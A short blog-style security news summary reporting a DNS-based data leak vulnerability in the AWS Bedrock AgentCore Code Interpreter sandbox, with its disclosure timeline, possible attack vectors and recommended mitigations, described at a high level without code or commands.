top of page

Researchers Uncover Data Leak Vulnerability in AWS Bedrock AI Code Interpreter

  • Mar 17
  • 2 min read

Key Findings


* Researchers discovered a vulnerability in AWS Bedrock AgentCore Code Interpreter


* DNS queries can be exploited to leak sensitive data from supposedly isolated AI systems


* Vulnerability received a high-risk severity score of 7.5/10


* AWS responded by updating documentation instead of creating a full patch


* Potential risks include data breaches and infrastructure compromise


Background


AWS Bedrock is a platform for building AI applications, with the AgentCore Code Interpreter allowing chatbots to write and execute code for tasks like data analysis. The system uses a Sandbox mode designed to isolate AI operations from external networks, creating a supposedly secure environment for code execution.


Technical Vulnerability


The core issue lies in the Sandbox mode's DNS query handling. While most network traffic is blocked, the system still allows DNS A and AAAA record queries. Researchers demonstrated that an attacker could hide commands and exfiltrate data by manipulating these DNS requests, effectively creating a covert communication channel.


Proof of Concept


The research team developed a system that could:


* Run data through DNS queries


* Establish two-way communication with isolated AI


* Bypass AWS's promised security isolation


* Demonstrate a DNS command-and-control channel using ASCII-encoded data


Disclosure Timeline


* September 2025: Initial vulnerability reported to AWS


* November 2025: AWS attempts a fix


* Two weeks later: Fix withdrawn due to technical issues


* Late December 2025: AWS opts for documentation update instead of patch


Potential Attack Vectors


Possible exploitation methods include:


* Prompt injection


* Supply chain attacks


* Manipulating third-party code libraries


* Accessing AWS S3 storage and Secrets Manager


Expert Recommendations


Security experts suggest:


* Switching to VPC mode


* Minimizing AI tool permissions


* Implementing deception artifacts


* Auditing IAM roles


* Carefully monitoring AI code execution environments


Mitigation Strategies


Organizations can protect themselves by:


* Inventorying active Code Interpreter instances


* Migrating critical data instances to VPC mode


* Implementing strict access controls


* Continuously monitoring AI system interactions


Broader Implications


The vulnerability highlights significant challenges in AI system security, demonstrating that traditional isolation techniques may be insufficient for modern AI platforms. It underscores the need for more sophisticated security approaches that can handle the complex interactions of AI systems.


Sources


  • https://hackread.com/data-leak-risk-in-aws-bedrock-ai-code-interpreter/

  • https://x.com/HackRead/status/2033685581813707169

Recent Posts

See All

Comments


  • Youtube

© 2025 by Explain IT Again. Powered and secured by Wix

bottom of page